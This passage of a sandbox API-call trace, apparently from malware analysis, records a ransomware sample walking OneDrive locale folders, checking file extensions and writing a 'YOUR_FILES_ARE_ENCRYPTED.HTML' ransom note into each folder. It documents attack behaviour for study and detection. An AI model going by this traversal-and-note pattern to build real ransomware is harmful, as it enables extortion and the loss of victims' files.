cAlternateFileName="")) returned 0x42f3280 [0160.294] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa691d5b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6ae6630, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6ae6630, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.294] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6ae6630, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6ae6630, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6ae6630, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12cb0, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.294] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bn-bd\\FileSync.LocalizedResources.dll.mui") returned 113 [0160.294] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.295] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.295] lstrlenW (lpString=".mui") returned 4 [0160.295] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.295] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6ae6630, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6ae6630, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6ae6630, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12cb0, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.295] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.295] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bn-bd\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0160.295] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bn-bd\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\bn-bd\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0160.295] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.298] CloseHandle (hObject=0x5a8) returned 1 [0160.298] GetProcessHeap () returned 0x270000 [0160.299] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.299] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6ae6630, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6c89550, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6c89550, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="bn-in", cAlternateFileName="")) returned 1 [0160.299] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bn-in") returned 77 [0160.299] GetProcessHeap () returned 0x270000 [0160.299] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.299] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bn-in" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bn-in") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bn-in" [0160.299] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bn-in", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bn-in\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bn-in\\*" [0160.299] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bn-in\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6ae6630, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6c89550, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6c89550, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.301] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6ae6630, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6c89550, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6c89550, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.301] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6c89550, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6c89550, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6c89550, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12aa8, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.301] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bn-in\\FileSync.LocalizedResources.dll.mui") returned 113 [0160.301] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.301] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.301] lstrlenW (lpString=".mui") returned 4 [0160.301] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.301] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6c89550, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6c89550, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6c89550, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12aa8, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.301] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.301] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bn-in\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0160.301] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bn-in\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\bn-in\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0160.302] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.304] CloseHandle (hObject=0x5a8) returned 1 [0160.305] GetProcessHeap () returned 0x270000 [0160.306] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.306] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6c89550, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6e525d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6e525d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="bs-latn-ba", cAlternateFileName="BS-LAT~1")) returned 1 [0160.306] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bs-latn-ba") returned 82 [0160.306] GetProcessHeap () returned 0x270000 [0160.306] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.306] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bs-latn-ba" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bs-latn-ba") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bs-latn-ba" [0160.306] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bs-latn-ba", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bs-latn-ba\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bs-latn-ba\\*" [0160.306] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bs-latn-ba\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6c89550, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6e525d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6e525d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.307] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6c89550, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6e525d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6e525d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.307] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6e525d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6e525d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6e525d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x130b0, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.307] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bs-latn-ba\\FileSync.LocalizedResources.dll.mui") returned 118 [0160.307] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.307] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.307] lstrlenW (lpString=".mui") returned 4 [0160.307] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.307] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6e525d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6e525d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6e525d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x130b0, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.307] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.307] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bs-latn-ba\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0160.307] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bs-latn-ba\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\bs-latn-ba\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0160.308] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.310] CloseHandle (hObject=0x5a8) returned 1 [0160.311] GetProcessHeap () returned 0x270000 [0160.311] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.311] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6e525d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa708da70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa708da70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ca", cAlternateFileName="")) returned 1 [0160.311] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ca") returned 74 [0160.311] GetProcessHeap () returned 0x270000 [0160.311] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.312] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ca" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ca") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ca" [0160.312] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ca", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ca\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ca\\*" [0160.312] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ca\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6e525d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa708da70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa708da70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.313] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6e525d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa708da70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa708da70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.313] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa708da70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa708da70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa708da70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x136a8, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.313] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ca\\FileSync.LocalizedResources.dll.mui") returned 110 [0160.313] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.313] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.313] lstrlenW (lpString=".mui") returned 4 [0160.313] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.313] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa708da70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa708da70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa708da70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x136a8, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.313] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.313] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ca\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0160.313] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ca\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\ca\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0160.314] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.316] CloseHandle (hObject=0x5a8) returned 1 [0160.317] GetProcessHeap () returned 0x270000 [0160.318] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.318] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa708da70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7550670, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7550670, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ca-es-valencia", cAlternateFileName="CA-ES-~1")) returned 1 [0160.318] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ca-es-valencia") returned 86 [0160.318] GetProcessHeap () returned 0x270000 [0160.318] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.318] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ca-es-valencia" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ca-es-valencia") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ca-es-valencia" [0160.318] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ca-es-valencia", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ca-es-valencia\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ca-es-valencia\\*" [0160.318] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ca-es-valencia\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa708da70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7550670, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7550670, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.319] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa708da70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7550670, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7550670, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.319] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa7550670, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7550670, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7550670, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x136b0, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.319] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ca-es-valencia\\FileSync.LocalizedResources.dll.mui") returned 122 [0160.319] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.319] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.319] lstrlenW (lpString=".mui") returned 4 [0160.319] 